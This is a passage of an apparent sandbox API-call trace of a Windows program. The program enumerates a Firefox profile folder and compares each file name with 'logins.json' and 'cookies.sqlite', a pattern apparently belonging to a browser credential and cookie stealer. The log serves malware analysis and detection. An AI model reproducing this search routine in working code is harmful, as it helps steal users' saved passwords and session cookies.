HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="signons.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" [0161.097] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.097] GetProcessHeap () returned 0x8e0000 [0161.097] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.097] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="logins.json") returned 0x0 [0161.097] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.097] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.097] GetProcessHeap () returned 0x8e0000 [0161.097] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.097] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="times.json", cAlternateFileName="TIMES~1.JSO")) returned 1 [0161.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.097] lstrlenW (lpString="\\") returned 1 [0161.097] GetProcessHeap () returned 0x8e0000 [0161.097] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.097] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.097] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.097] lstrlenW (lpString="times.json") returned 10 [0161.097] GetProcessHeap () returned 0x8e0000 [0161.097] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x9254f8 [0161.097] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.097] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="times.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" [0161.097] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.097] GetProcessHeap () returned 0x8e0000 [0161.098] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.098] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="logins.json") returned 0x0 [0161.098] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json", lpSrch="cookies.sqlite") returned 0x0 [0161.098] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.098] GetProcessHeap () returned 0x8e0000 [0161.098] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.098] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps", cAlternateFileName="")) returned 1 [0161.098] lstrcmpiW (lpString1="webapps", lpString2=".") returned 1 [0161.098] lstrcmpiW (lpString1="webapps", lpString2="..") returned 1 [0161.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.098] lstrlenW (lpString="\\") returned 1 [0161.098] GetProcessHeap () returned 0x8e0000 [0161.098] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.098] lstrlenW (lpString="webapps") returned 7 [0161.098] GetProcessHeap () returned 0x8e0000 [0161.098] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9254f8 [0161.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.098] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.098] GetProcessHeap () returned 0x8e0000 [0161.098] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.098] lstrlenW (lpString="") returned 0 [0161.098] GetProcessHeap () returned 0x8e0000 [0161.098] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9255c0 [0161.098] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.098] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.098] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.098] lstrlenW (lpString="\\*.*") returned 4 [0161.098] GetProcessHeap () returned 0x8e0000 [0161.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x925688 [0161.099] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.099] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*" [0161.099] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*.*", lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.099] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.099] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x80d71510, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80d71510, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.099] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.099] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.099] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 1 [0161.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned 95 [0161.099] lstrlenW (lpString="\\") returned 1 [0161.099] GetProcessHeap () returned 0x8e0000 [0161.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x925758 [0161.099] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.099] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0161.099] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0161.099] lstrlenW (lpString="webapps.json") returned 12 [0161.099] GetProcessHeap () returned 0x8e0000 [0161.099] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x925828 [0161.099] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0161.099] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="webapps.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" [0161.099] VirtualQuery (in: lpAddress=0x925758, lpBuffer=0x2defb8, dwLength=0x1c | out: lpBuffer=0x2defb8*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.099] GetProcessHeap () returned 0x8e0000 [0161.099] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925758 | out: hHeap=0x8e0000) returned 1 [0161.099] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="logins.json") returned 0x0 [0161.099] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json", lpSrch="cookies.sqlite") returned 0x0 [0161.099] VirtualQuery (in: lpAddress=0x925828, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.099] GetProcessHeap () returned 0x8e0000 [0161.100] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925828 | out: hHeap=0x8e0000) returned 1 [0161.100] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 0 [0161.100] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.100] VirtualQuery (in: lpAddress=0x925688, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.100] GetProcessHeap () returned 0x8e0000 [0161.100] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925688 | out: hHeap=0x8e0000) returned 1 [0161.100] VirtualQuery (in: lpAddress=0x9255c0, lpBuffer=0x2defc4, dwLength=0x1c | out: lpBuffer=0x2defc4*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.100] GetProcessHeap () returned 0x8e0000 [0161.100] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255c0 | out: hHeap=0x8e0000) returned 1 [0161.100] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.100] GetProcessHeap () returned 0x8e0000 [0161.100] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.100] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.100] lstrlenW (lpString="\\") returned 1 [0161.100] GetProcessHeap () returned 0x8e0000 [0161.100] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.100] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.100] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.100] lstrlenW (lpString="webapps") returned 7 [0161.100] GetProcessHeap () returned 0x8e0000 [0161.100] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9254f8 [0161.100] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.100] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="webapps" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps" [0161.100] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.100] GetProcessHeap () returned 0x8e0000 [0161.100] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.101] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="logins.json") returned 0x0 [0161.101] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps", lpSrch="cookies.sqlite") returned 0x0 [0161.101] VirtualQuery (in: lpAddress=0x9254f8, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.101] GetProcessHeap () returned 0x8e0000 [0161.101] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254f8 | out: hHeap=0x8e0000) returned 1 [0161.101] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb66495d0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb66495d0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3a63b40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x0, dwReserved1=0x0, cFileName="webappsstore.sqlite", cAlternateFileName="WEBAPP~1.SQL")) returned 1 [0161.101] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.101] lstrlenW (lpString="\\") returned 1 [0161.101] GetProcessHeap () returned 0x8e0000 [0161.101] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925438 [0161.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.101] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.101] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.101] lstrlenW (lpString="webappsstore.sqlite") returned 19 [0161.101] GetProcessHeap () returned 0x8e0000 [0161.101] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x9254f8 [0161.101] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.101] lstrcatW (in: 